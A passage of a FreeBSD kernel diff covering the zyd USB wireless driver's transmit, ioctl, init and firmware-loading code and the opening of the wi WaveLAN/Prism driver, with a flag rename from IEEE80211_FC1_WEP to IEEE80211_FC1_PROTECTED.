*tp; struct ieee80211_key *k; int rate, totlen; static uint8_t ratediv[] = ZYD_TX_RATEDIV; uint8_t phy; uint16_t pktlen; uint32_t bits; wh = mtod(m0, struct ieee80211_frame *); data = STAILQ_FIRST(&sc->tx_free); STAILQ_REMOVE_HEAD(&sc->tx_free, next); sc->tx_nfree--; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT || (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; rate = tp->mgmtrate; } else { tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; /* for data frames */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if 
(k == NULL) { m_freem(m0); return (ENOBUFS); } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } data->ni = ni; data->m = m0; data->rate = rate; /* fill Tx descriptor */ desc = &data->desc; phy = zyd_plcp_signal(sc, rate); desc->phy = phy; if (ZYD_RATE_IS_OFDM(rate)) { desc->phy |= ZYD_TX_PHY_OFDM; if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) desc->phy |= ZYD_TX_PHY_5GHZ; } else if (rate != 2 && (ic->ic_flags & IEEE80211_F_SHPREAMBLE)) desc->phy |= ZYD_TX_PHY_SHPREAMBLE; totlen = m0->m_pkthdr.len + IEEE80211_CRC_LEN; desc->len = htole16(totlen); desc->flags = ZYD_TX_FLAG_BACKOFF; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* multicast frames are not sent at OFDM rates in 802.11b/g */ if (totlen > vap->iv_rtsthreshold) { desc->flags |= ZYD_TX_FLAG_RTS; } else if (ZYD_RATE_IS_OFDM(rate) && (ic->ic_flags & IEEE80211_F_USEPROT)) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) desc->flags |= ZYD_TX_FLAG_CTS_TO_SELF; else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) desc->flags |= ZYD_TX_FLAG_RTS; } } else desc->flags |= ZYD_TX_FLAG_MULTICAST; if ((wh->i_fc[0] & (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_MASK)) == (IEEE80211_FC0_TYPE_CTL | IEEE80211_FC0_SUBTYPE_PS_POLL)) desc->flags |= ZYD_TX_FLAG_TYPE(ZYD_TX_TYPE_PS_POLL); /* actual transmit length (XXX why +10?) */ pktlen = ZYD_TX_DESC_SIZE + 10; if (sc->sc_macrev == ZYD_ZD1211) pktlen += totlen; desc->pktlen = htole16(pktlen); bits = (rate == 11) ? (totlen * 16) + 10 : ((rate == 22) ? (totlen * 8) + 10 : (totlen * 8)); desc->plcp_length = htole16(bits / ratediv[phy]); desc->plcp_service = 0; if (rate == 22 && (bits % 11) > 0 && (bits % 11) <= 3) desc->plcp_service |= ZYD_PLCP_LENGEXT; desc->nextlen = 0; if (ieee80211_radiotap_active_vap(vap)) { struct zyd_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; ieee80211_radiotap_tx(vap, m0); } DPRINTF(sc, ZYD_DEBUG_XMIT, "%s: sending data frame len=%zu rate=%u\n", device_get_nameunit(sc->sc_dev), (size_t)m0->m_pkthdr.len, rate); STAILQ_INSERT_TAIL(&sc->tx_q, data, next); usbd_transfer_start(sc->sc_xfer[ZYD_BULK_WR]); return (0); } static void zyd_start(struct ifnet *ifp) { struct zyd_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; ZYD_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->tx_nfree == 0) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; if (zyd_tx_start(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } } ZYD_UNLOCK(sc); } static int zyd_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct zyd_softc *sc = ifp->if_softc; ZYD_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { ZYD_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } if (sc->tx_nfree == 0) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; ZYD_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return (ENOBUFS); /* XXX */ } /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. 
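 * (As written, the ieee80211_bpf_params supplied by the caller are not
 * consulted; the frame simply goes through zyd_tx_start(), so the rate and
 * protection settings come from the node/vap state rather than from the
 * caller.)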
* XXX raw path */ if (zyd_tx_start(sc, m, ni) != 0) { ZYD_UNLOCK(sc); ifp->if_oerrors++; ieee80211_free_node(ni); return (EIO); } ZYD_UNLOCK(sc); return (0); } static int zyd_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct zyd_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; ZYD_LOCK(sc); error = (sc->sc_flags & ZYD_FLAG_DETACHED) ? ENXIO : 0; ZYD_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: ZYD_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { zyd_init_locked(sc); startall = 1; } else zyd_set_multi(sc); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) zyd_stop(sc); } ZYD_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void zyd_init_locked(struct zyd_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct usb_config_descriptor *cd; int error; uint32_t val; ZYD_LOCK_ASSERT(sc, MA_OWNED); if (!(sc->sc_flags & ZYD_FLAG_INITONCE)) { error = zyd_loadfirmware(sc); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware (error=%d)\n", error); goto fail; } /* reset device */ cd = usbd_get_config_descriptor(sc->sc_udev); error = usbd_req_set_config(sc->sc_udev, &sc->sc_mtx, cd->bConfigurationValue); if (error) device_printf(sc->sc_dev, "reset failed, continuing\n"); error = zyd_hw_init(sc); if (error) { device_printf(sc->sc_dev, "hardware initialization failed\n"); goto fail; } device_printf(sc->sc_dev, "HMAC ZD1211%s, FW %02x.%02x, RF %s S%x, PA%x LED %x " "BE%x NP%x Gain%x F%x\n", (sc->sc_macrev == ZYD_ZD1211) ? "": "B", sc->sc_fwrev >> 8, sc->sc_fwrev & 0xff, zyd_rf_name(sc->sc_rfrev), sc->sc_al2230s, sc->sc_parev, sc->sc_ledtype, sc->sc_bandedge6, sc->sc_newphy, sc->sc_cckgain, sc->sc_fix_cr157); /* read regulatory domain (currently unused) */ zyd_read32_m(sc, ZYD_EEPROM_SUBID, &val); sc->sc_regdomain = val >> 16; DPRINTF(sc, ZYD_DEBUG_INIT, "regulatory domain %x\n", sc->sc_regdomain); /* we'll do software WEP decryption for now */ DPRINTF(sc, ZYD_DEBUG_INIT, "%s: setting encryption type\n", __func__); zyd_write32_m(sc, ZYD_MAC_ENCRYPTION_TYPE, ZYD_ENC_SNIFFER); sc->sc_flags |= ZYD_FLAG_INITONCE; } if (ifp->if_drv_flags & IFF_DRV_RUNNING) zyd_stop(sc); DPRINTF(sc, ZYD_DEBUG_INIT, "setting MAC address to %6D\n", IF_LLADDR(ifp), ":"); error = zyd_set_macaddr(sc, IF_LLADDR(ifp)); if (error != 0) return; /* set basic rates */ if (ic->ic_curmode == IEEE80211_MODE_11B) zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0x0003); else if (ic->ic_curmode == IEEE80211_MODE_11A) zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0x1500); else /* assumes 802.11b/g */ zyd_write32_m(sc, ZYD_MAC_BAS_RATE, 0xff0f); /* promiscuous mode */ zyd_write32_m(sc, ZYD_MAC_SNIFFER, 0); /* multicast setup */ zyd_set_multi(sc); /* set RX filter */ error = zyd_set_rxfilter(sc); if (error != 0) goto fail; /* switch radio transmitter ON */ error = zyd_switch_radio(sc, 1); if (error != 0) goto fail; /* set default BSS channel */ zyd_set_chan(sc, ic->ic_curchan); /* * Allocate Tx and Rx xfer queues. 
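 * (Only the Tx list needs explicit setup here; zyd_rx_data() copies received
 * frames out of the USB transfer buffer into freshly allocated mbufs, so no
 * separate Rx descriptor list appears to be required.)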
*/ zyd_setup_tx_list(sc); /* enable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, ZYD_HWINT_MASK); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[ZYD_BULK_WR]); usbd_transfer_start(sc->sc_xfer[ZYD_BULK_RD]); usbd_transfer_start(sc->sc_xfer[ZYD_INTR_RD]); return; fail: zyd_stop(sc); return; } static void zyd_init(void *priv) { struct zyd_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ZYD_LOCK(sc); zyd_init_locked(sc); ZYD_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void zyd_stop(struct zyd_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error; ZYD_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* * Drain all the transfers, if not already drained: */ ZYD_UNLOCK(sc); usbd_transfer_drain(sc->sc_xfer[ZYD_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[ZYD_BULK_RD]); ZYD_LOCK(sc); zyd_unsetup_tx_list(sc); /* Stop now if the device was never set up */ if (!(sc->sc_flags & ZYD_FLAG_INITONCE)) return; /* switch radio transmitter OFF */ error = zyd_switch_radio(sc, 0); if (error != 0) goto fail; /* disable Rx */ zyd_write32_m(sc, ZYD_MAC_RXFILTER, 0); /* disable interrupts */ zyd_write32_m(sc, ZYD_CR_INTERRUPT, 0); fail: return; } static int zyd_loadfirmware(struct zyd_softc *sc) { struct usb_device_request req; size_t size; u_char *fw; uint8_t stat; uint16_t addr; if (sc->sc_flags & ZYD_FLAG_FWLOADED) return (0); if (sc->sc_macrev == ZYD_ZD1211) { fw = (u_char *)zd1211_firmware; size = sizeof(zd1211_firmware); } else { fw = (u_char *)zd1211b_firmware; size = sizeof(zd1211b_firmware); } req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = ZYD_DOWNLOADREQ; USETW(req.wIndex, 0); addr = ZYD_FIRMWARE_START_ADDR; while (size > 0) { /* * Transfers of 4096 bytes at a time do not seem to go through * reliably; whether the limitation lies in the USB port, the host * machine or the chip is unclear, so push the firmware in small * 64-byte blocks instead. */ const int mlen = min(size, 64); DPRINTF(sc, ZYD_DEBUG_FW, "loading firmware block: len=%d, addr=0x%x\n", mlen, addr); USETW(req.wValue, addr); USETW(req.wLength, mlen); if (zyd_do_request(sc, &req, fw) != 0) return (EIO); addr += mlen / 2; fw += mlen; size -= mlen; } /* check whether the upload succeeded */ req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = ZYD_DOWNLOADSTS; USETW(req.wValue, 0); USETW(req.wIndex, 0); USETW(req.wLength, sizeof(stat)); if (zyd_do_request(sc, &req, &stat) != 0) return (EIO); sc->sc_flags |= ZYD_FLAG_FWLOADED; return (stat & 0x80) ?
(EIO) : (0); } static void zyd_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct zyd_softc *sc = ifp->if_softc; ZYD_LOCK(sc); /* want broadcast address while scanning */ zyd_set_bssid(sc, ifp->if_broadcastaddr); ZYD_UNLOCK(sc); } static void zyd_scan_end(struct ieee80211com *ic) { struct zyd_softc *sc = ic->ic_ifp->if_softc; ZYD_LOCK(sc); /* restore previous bssid */ zyd_set_bssid(sc, sc->sc_bssid); ZYD_UNLOCK(sc); } static void zyd_set_channel(struct ieee80211com *ic) { struct zyd_softc *sc = ic->ic_ifp->if_softc; ZYD_LOCK(sc); zyd_set_chan(sc, ic->ic_curchan); ZYD_UNLOCK(sc); } static device_method_t zyd_methods[] = { /* Device interface */ DEVMETHOD(device_probe, zyd_match), DEVMETHOD(device_attach, zyd_attach), DEVMETHOD(device_detach, zyd_detach), DEVMETHOD_END }; static driver_t zyd_driver = { .name = "zyd", .methods = zyd_methods, .size = sizeof(struct zyd_softc) }; static devclass_t zyd_devclass; DRIVER_MODULE(zyd, uhub, zyd_driver, zyd_devclass, NULL, 0); MODULE_DEPEND(zyd, usb, 1, 1, 1); MODULE_DEPEND(zyd, wlan, 1, 1, 1); MODULE_VERSION(zyd, 1); diff --git a/sys/dev/wi/if_wi.c b/sys/dev/wi/if_wi.c index ac6d8c09bb92..d713c97eb6a7 100644 --- a/sys/dev/wi/if_wi.c +++ b/sys/dev/wi/if_wi.c @@ -1,2127 +1,2127 @@ /*- * Copyright (c) 1997, 1998, 1999 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL Bill Paul OR THE VOICES IN HIS HEAD * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. */ /* * Lucent WaveLAN/IEEE 802.11 PCMCIA driver. * * Original FreeBSD driver written by Bill Paul * Electrical Engineering Department * Columbia University, New York City */ /* * The WaveLAN/IEEE adapter is the second generation of the WaveLAN * from Lucent. Unlike the older cards, the new ones are programmed * entirely via a firmware-driven controller called the Hermes. * Unfortunately, Lucent will not release the Hermes programming manual * without an NDA (if at all). 
What they do release is an API library * called the HCF (Hardware Control Functions) which is supposed to * do the device-specific operations of a device driver for you. The * publically available version of the HCF library (the 'HCF Light') is * a) extremely gross, b) lacks certain features, particularly support * for 802.11 frames, and c) is contaminated by the GNU Public License. * * This driver does not use the HCF or HCF Light at all. Instead, it * programs the Hermes controller directly, using information gleaned * from the HCF Light code and corresponding documentation. * * This driver supports the ISA, PCMCIA and PCI versions of the Lucent * WaveLan cards (based on the Hermes chipset), as well as the newer * Prism 2 chipsets with firmware from Intersil and Symbol. */ #include __FBSDID("$FreeBSD$"); #include "opt_wlan.h" #define WI_HERMES_STATS_WAR /* Work around stats counter bug. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include static struct ieee80211vap *wi_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void wi_vap_delete(struct ieee80211vap *vap); static void wi_stop_locked(struct wi_softc *sc, int disable); static void wi_start_locked(struct ifnet *); static void wi_start(struct ifnet *); static int wi_start_tx(struct ifnet *ifp, struct wi_frame *frmhdr, struct mbuf *m0); static int wi_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static int wi_newstate_sta(struct ieee80211vap *, enum ieee80211_state, int); static int wi_newstate_hostap(struct ieee80211vap *, enum ieee80211_state, int); static void wi_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m, int subtype, int rssi, int nf); static int wi_reset(struct wi_softc *); static void wi_watchdog(void *); static int wi_ioctl(struct ifnet *, u_long, caddr_t); static void wi_media_status(struct ifnet *, struct ifmediareq *); static void wi_rx_intr(struct wi_softc *); static void wi_tx_intr(struct wi_softc *); static void wi_tx_ex_intr(struct wi_softc *); static void wi_info_intr(struct wi_softc *); static int wi_write_txrate(struct wi_softc *, struct ieee80211vap *); static int wi_write_wep(struct wi_softc *, struct ieee80211vap *); static int wi_write_multi(struct wi_softc *); static void wi_update_mcast(struct ifnet *); static void wi_update_promisc(struct ifnet *); static int wi_alloc_fid(struct wi_softc *, int, int *); static void wi_read_nicid(struct wi_softc *); static int wi_write_ssid(struct wi_softc *, int, u_int8_t *, int); static int wi_cmd(struct wi_softc *, int, int, int, int); static int wi_seek_bap(struct wi_softc *, int, int); static int wi_read_bap(struct wi_softc *, int, int, void *, int); static int wi_write_bap(struct wi_softc *, int, int, void *, int); static int wi_mwrite_bap(struct wi_softc *, int, int, struct mbuf *, int); static int wi_read_rid(struct wi_softc *, int, void *, int *); static int wi_write_rid(struct wi_softc *, int, void *, int); static int wi_write_appie(struct wi_softc *, int, const struct ieee80211_appie *); static void wi_scan_start(struct ieee80211com *); static void wi_scan_end(struct ieee80211com *); static void 
wi_set_channel(struct ieee80211com *); static __inline int wi_write_val(struct wi_softc *sc, int rid, u_int16_t val) { val = htole16(val); return wi_write_rid(sc, rid, &val, sizeof(val)); } static SYSCTL_NODE(_hw, OID_AUTO, wi, CTLFLAG_RD, 0, "Wireless driver parameters"); static struct timeval lasttxerror; /* time of last tx error msg */ static int curtxeps; /* current tx error msgs/sec */ static int wi_txerate = 0; /* tx error rate: max msgs/sec */ SYSCTL_INT(_hw_wi, OID_AUTO, txerate, CTLFLAG_RW, &wi_txerate, 0, "max tx error msgs/sec; 0 to disable msgs"); #define WI_DEBUG #ifdef WI_DEBUG static int wi_debug = 0; SYSCTL_INT(_hw_wi, OID_AUTO, debug, CTLFLAG_RW, &wi_debug, 0, "control debugging printfs"); #define DPRINTF(X) if (wi_debug) printf X #else #define DPRINTF(X) #endif #define WI_INTRS (WI_EV_RX | WI_EV_ALLOC | WI_EV_INFO) struct wi_card_ident wi_card_ident[] = { /* CARD_ID CARD_NAME FIRM_TYPE */ { WI_NIC_LUCENT_ID, WI_NIC_LUCENT_STR, WI_LUCENT }, { WI_NIC_SONY_ID, WI_NIC_SONY_STR, WI_LUCENT }, { WI_NIC_LUCENT_EMB_ID, WI_NIC_LUCENT_EMB_STR, WI_LUCENT }, { WI_NIC_EVB2_ID, WI_NIC_EVB2_STR, WI_INTERSIL }, { WI_NIC_HWB3763_ID, WI_NIC_HWB3763_STR, WI_INTERSIL }, { WI_NIC_HWB3163_ID, WI_NIC_HWB3163_STR, WI_INTERSIL }, { WI_NIC_HWB3163B_ID, WI_NIC_HWB3163B_STR, WI_INTERSIL }, { WI_NIC_EVB3_ID, WI_NIC_EVB3_STR, WI_INTERSIL }, { WI_NIC_HWB1153_ID, WI_NIC_HWB1153_STR, WI_INTERSIL }, { WI_NIC_P2_SST_ID, WI_NIC_P2_SST_STR, WI_INTERSIL }, { WI_NIC_EVB2_SST_ID, WI_NIC_EVB2_SST_STR, WI_INTERSIL }, { WI_NIC_3842_EVA_ID, WI_NIC_3842_EVA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_AMD_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_SST_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_ATL_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_PCMCIA_ATS_ID, WI_NIC_3842_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_AMD_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_SST_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_ATL_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_MINI_ATS_ID, WI_NIC_3842_MINI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_AMD_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_SST_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_ATS_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_3842_PCI_ATL_ID, WI_NIC_3842_PCI_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_AMD_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_SST_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_ATL_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_PCMCIA_ATS_ID, WI_NIC_P3_PCMCIA_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_AMD_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_SST_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_ATL_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { WI_NIC_P3_MINI_ATS_ID, WI_NIC_P3_MINI_STR, WI_INTERSIL }, { 0, NULL, 0 }, }; static char *wi_firmware_names[] = { "none", "Hermes", "Intersil", "Symbol" }; devclass_t wi_devclass; int wi_attach(device_t dev) { struct wi_softc *sc = device_get_softc(dev); struct ieee80211com *ic; struct ifnet *ifp; int i, nrates, buflen; u_int16_t val; u_int8_t ratebuf[2 + IEEE80211_RATE_SIZE]; struct ieee80211_rateset *rs; struct sysctl_ctx_list *sctx; struct sysctl_oid *soid; static const u_int8_t empty_macaddr[IEEE80211_ADDR_LEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; int error; uint8_t macaddr[IEEE80211_ADDR_LEN]; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc\n"); wi_free(dev); return ENOSPC; } ic = 
ifp->if_l2com; sc->sc_firmware_type = WI_NOTYPE; sc->wi_cmd_count = 500; /* Reset the NIC. */ if (wi_reset(sc) != 0) { wi_free(dev); return ENXIO; /* XXX */ } /* Read NIC identification */ wi_read_nicid(sc); switch (sc->sc_firmware_type) { case WI_LUCENT: if (sc->sc_sta_firmware_ver < 60006) goto reject; break; case WI_INTERSIL: if (sc->sc_sta_firmware_ver < 800) goto reject; break; default: reject: device_printf(dev, "Sorry, this card is not supported " "(type %d, firmware ver %d)\n", sc->sc_firmware_type, sc->sc_sta_firmware_ver); wi_free(dev); return EOPNOTSUPP; } /* Export info about the device via sysctl */ sctx = device_get_sysctl_ctx(dev); soid = device_get_sysctl_tree(dev); SYSCTL_ADD_STRING(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "firmware_type", CTLFLAG_RD, wi_firmware_names[sc->sc_firmware_type], 0, "Firmware type string"); SYSCTL_ADD_INT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "sta_version", CTLFLAG_RD, &sc->sc_sta_firmware_ver, 0, "Station Firmware version"); if (sc->sc_firmware_type == WI_INTERSIL) SYSCTL_ADD_INT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "pri_version", CTLFLAG_RD, &sc->sc_pri_firmware_ver, 0, "Primary Firmware version"); SYSCTL_ADD_UINT(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "nic_id", CTLFLAG_RD, &sc->sc_nic_id, 0, "NIC id"); SYSCTL_ADD_STRING(sctx, SYSCTL_CHILDREN(soid), OID_AUTO, "nic_name", CTLFLAG_RD, sc->sc_nic_name, 0, "NIC name"); mtx_init(&sc->sc_mtx, device_get_nameunit(dev), MTX_NETWORK_LOCK, MTX_DEF | MTX_RECURSE); callout_init_mtx(&sc->sc_watchdog, &sc->sc_mtx, 0); /* * Read the station address. * And do it twice. I've seen PRISM-based cards that return * an error when trying to read it the first time, which causes * the probe to fail. */ buflen = IEEE80211_ADDR_LEN; error = wi_read_rid(sc, WI_RID_MAC_NODE, macaddr, &buflen); if (error != 0) { buflen = IEEE80211_ADDR_LEN; error = wi_read_rid(sc, WI_RID_MAC_NODE, macaddr, &buflen); } if (error || IEEE80211_ADDR_EQ(macaddr, empty_macaddr)) { if (error != 0) device_printf(dev, "mac read failed %d\n", error); else { device_printf(dev, "mac read failed (all zeros)\n"); error = ENXIO; } wi_free(dev); return (error); } ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_ioctl = wi_ioctl; ifp->if_start = wi_start; ifp->if_init = wi_init; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_DS; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA | IEEE80211_C_PMGT | IEEE80211_C_MONITOR ; /* * Query the card for available channels and setup the * channel table. We assume these are all 11b channels. */ buflen = sizeof(val); if (wi_read_rid(sc, WI_RID_CHANNEL_LIST, &val, &buflen) != 0) val = htole16(0x1fff); /* assume 1-11 */ KASSERT(val != 0, ("wi_attach: no available channels listed!")); val <<= 1; /* shift for base 1 indices */ for (i = 1; i < 16; i++) { struct ieee80211_channel *c; if (!isset((u_int8_t*)&val, i)) continue; c = &ic->ic_channels[ic->ic_nchans++]; c->ic_freq = ieee80211_ieee2mhz(i, IEEE80211_CHAN_B); c->ic_flags = IEEE80211_CHAN_B; c->ic_ieee = i; /* XXX txpowers? */ } /* * Set flags based on firmware version. 
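 * (Roughly: Lucent/Hermes firmware gets a single Tx buffer and IBSS support,
 * while Intersil/Prism firmware gets multiple Tx buffers, host-AP support and,
 * for sufficiently new station firmware, the enhanced-security and WPA bits.)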
*/ switch (sc->sc_firmware_type) { case WI_LUCENT: sc->sc_ntxbuf = 1; ic->ic_caps |= IEEE80211_C_IBSS; sc->sc_ibss_port = WI_PORTTYPE_BSS; sc->sc_monitor_port = WI_PORTTYPE_ADHOC; sc->sc_min_rssi = WI_LUCENT_MIN_RSSI; sc->sc_max_rssi = WI_LUCENT_MAX_RSSI; sc->sc_dbm_offset = WI_LUCENT_DBM_OFFSET; break; case WI_INTERSIL: sc->sc_ntxbuf = WI_NTXBUF; sc->sc_flags |= WI_FLAGS_HAS_FRAGTHR | WI_FLAGS_HAS_ROAMING; /* * Old firmware are slow, so give peace a chance. */ if (sc->sc_sta_firmware_ver < 10000) sc->wi_cmd_count = 5000; if (sc->sc_sta_firmware_ver > 10101) sc->sc_flags |= WI_FLAGS_HAS_DBMADJUST; ic->ic_caps |= IEEE80211_C_IBSS; /* * version 0.8.3 and newer are the only ones that are known * to currently work. Earlier versions can be made to work, * at least according to the Linux driver but we require * monitor mode so this is irrelevant. */ ic->ic_caps |= IEEE80211_C_HOSTAP; if (sc->sc_sta_firmware_ver >= 10603) sc->sc_flags |= WI_FLAGS_HAS_ENHSECURITY; if (sc->sc_sta_firmware_ver >= 10700) { /* * 1.7.0+ have the necessary support for sta mode WPA. */ sc->sc_flags |= WI_FLAGS_HAS_WPASUPPORT; ic->ic_caps |= IEEE80211_C_WPA; } sc->sc_ibss_port = WI_PORTTYPE_IBSS; sc->sc_monitor_port = WI_PORTTYPE_APSILENT; sc->sc_min_rssi = WI_PRISM_MIN_RSSI; sc->sc_max_rssi = WI_PRISM_MAX_RSSI; sc->sc_dbm_offset = WI_PRISM_DBM_OFFSET; break; } /* * Find out if we support WEP on this card. */ buflen = sizeof(val); if (wi_read_rid(sc, WI_RID_WEP_AVAIL, &val, &buflen) == 0 && val != htole16(0)) ic->ic_cryptocaps |= IEEE80211_CRYPTO_WEP; /* Find supported rates. */ buflen = sizeof(ratebuf); rs = &ic->ic_sup_rates[IEEE80211_MODE_11B]; if (wi_read_rid(sc, WI_RID_DATA_RATES, ratebuf, &buflen) == 0) { nrates = le16toh(*(u_int16_t *)ratebuf); if (nrates > 